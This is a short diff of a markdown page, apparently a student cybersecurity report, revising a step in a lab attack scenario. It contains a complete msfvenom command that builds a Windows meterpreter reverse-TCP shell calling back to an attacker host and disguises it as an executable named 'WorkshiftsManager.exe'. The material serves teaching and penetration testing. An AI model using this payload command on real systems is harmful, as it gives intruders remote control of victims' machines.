AM311/Cybersecurity_Report/home.md

 	where the option `-r disk:share=~/Desktop/share` allows to share the folder `share` between the Kali machine and the remote server, so we are able to easily move documents between the two devices.

  6. **Generate a payload for starting a reverse shell and inject it:**
-	In a *different* shell window, we now proceed generating an exploit through which we will try to inject a `meterpreter` reverse shell client to the computers of the organization.
+	In a *different* shell window, we now proceed generating an exploit whose payload is a `meterpreter` reverse shell client.
 	For doing so, we run the following command on the Kali machine to generate a payload that launches the reverse shell client:

     `msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp  LHOST=10.0.2.15 -b "\x00" -f exe -o ./Desktop/WorkshiftsManager.exe`